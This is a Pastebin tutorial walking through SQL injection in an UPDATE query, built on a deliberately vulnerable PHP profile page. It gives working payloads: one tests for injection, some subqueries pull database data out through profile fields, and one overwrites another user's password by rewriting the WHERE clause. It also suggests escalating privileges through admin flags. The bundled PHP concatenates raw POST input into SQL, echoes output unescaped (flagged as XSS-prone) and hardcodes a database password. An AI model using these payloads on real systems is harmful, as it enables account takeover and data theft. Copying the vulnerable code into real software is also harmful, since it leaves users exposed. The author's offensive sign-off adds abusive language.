API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 27th, 2017
153
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.17 KB | None | 0 0
raw download clone embed print report
  1. Hey, iam going to show you a little about update sql injections.
  2.  
  3. This occurs sometimes, for example in profil pages.
  4. The SQL-Statement is not secure, because there are not filter mechanisms active
  5. and i havent used PDO or similar.
  6.  
  7. This is mostly used as blind sql injection, i show you, howto get output anyway.
  8. And far more interesting ;)
  9.  
  10. The interesting line from the source code is the following
  11.  
  12. if($_POST["submit"]) {
  13.  mysql_query("UPDATE users SET user_name='".$_POST['user_name']."', user_password='".$_POST['user_password']."', user_realname='".$_POST['user_realname']."', user_website='".$_POST['user_website']."' where id=".$id) or die(mysql_error());
  14.  echo "<b> Your Profile was sucessfully updated!</b><br>\n";
  15. }
  16.  
  17. The code tells the query, to put the input directly into the database, which is a very dangerous behaviour.
  18.  
  19.  
  20. I have 2 prepared users,
  21. id 1 jon doe
  22. id 2 maria doe
  23.  
  24. ______________________________________________________
  25.  
  26. You can tell by simply checking the following payload:
  27. 1' OR 1='1
  28.  
  29. This is a good indicator that the form is vulnerable,
  30. lets look at the source
  31.  
  32.  
  33. the input forms have very interesting names, you could just try to overwrite a col by doing the following:
  34. (the requirement is that the column names you are trying to overwrite are existent!)
  35.  
  36. ', user_website=(select 123), user_realname='1
  37.  
  38. what you actually do is escape from the column set, and then set your own by using a direct mysql subquery
  39. (select 123)
  40. and then using user_realname to close your query with a right syntax.
  41.  
  42.  
  43. this would tell the query, to insert YOUR statement inside of the query
  44.  
  45. you actually just use your own statement. you can now print everything you want to. for ex:
  46. ', user_website=(select version()), user_realname='1
  47.  
  48. You have an direct output from the database, but there is more.
  49. you can UPDATE values like passwords from other users
  50.  
  51. ', user_password='mynewchangedpassword' where id=2#
  52.  
  53. This will change the password, owned by another user (id 2).
  54. In this example, other values are getting overwritten too because all datas are getting overwritten in the example profil page update.
  55.  
  56.  
  57. lets check marias profile password
  58. as you can see, we have overwritten marias profile values.
  59. you can also higher your privileges when for example an admin flag just like
  60. admin=1  or rights=1/2/3/4 .
  61.  
  62. this is a cheap tutorial. source code will be added.
  63. this is a presentation by frank, fuck you all !
  64.  
  65. <?php
  66.  
  67. $id = ($_GET['id'] ? $_GET['id'] : 1);
  68. mysql_connect("localhost", "stream", "hurensohn") or die(mysql_error());
  69. mysql_select_db("stream") or die(mysql_error());
  70.  
  71. if($_POST["submit"]) {
  72.  mysql_query("UPDATE users SET user_name='".$_POST['user_name']."', user_password='".$_POST['user_password']."', user_realname='".$_POST['user_realname']."', user_website='".$_POST['user_website']."' where id=".$id) or die(mysql_error());
  73.  echo "<b> Your Profile was sucessfully updated!</b><br>\n";
  74. }
  75.  
  76. $query = mysql_query("SELECT * from users where id=".intval($id));
  77. $array = mysql_fetch_array($query);
  78. ?>
  79. <h1>Edit your profile:</h1><br>
  80. <FORM method="POST">
  81. <LABEL for="user">Username: </LABEL>
  82.         <INPUT autocomplete="off" type="text" name="user_name" value="<?php echo $array['user_name'] ?>"><BR>
  83. <LABEL for="real">Real Name: </LABEL>
  84.         <INPUT autocomplete="off" type="text" name="user_realname" value="<?php echo $array['user_realname'] ?>"><BR>
  85. <LABEL for="password">Password: </LABEL>
  86.         <INPUT autocomplete="off" type="text" name="user_password" value="<?php echo $array['user_password'] ?>"><BR>
  87. <LABEL for="website">Website: </LABEL>
  88.         <INPUT autocomplete="off" type="text" name="user_website" value="<?php echo $array['user_website'] ?>"><BR>
  89. <INPUT type="submit" value="Send" name="submit">
  90. </FORM>
  91. <?php
  92. echo "Data:<br>\n";
  93. echo "<label id=\"user_id\"><b>ID:       ".$array['id']."</b><br></label>\n";
  94. echo "<label id=\"user_name\"><b>Username: ".$array['user_name']."</b><br></label>\n";
  95. echo "<label id=\"user_realname\"><b>Realname: ".$array['user_realname']."</b><br></label>\n";
  96. echo "<label id=\"user_website\"><b>Website : ".$array['user_website']."</b><br></label>\n";
  97. ?>
  98. // you can have your cheap xss here :>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!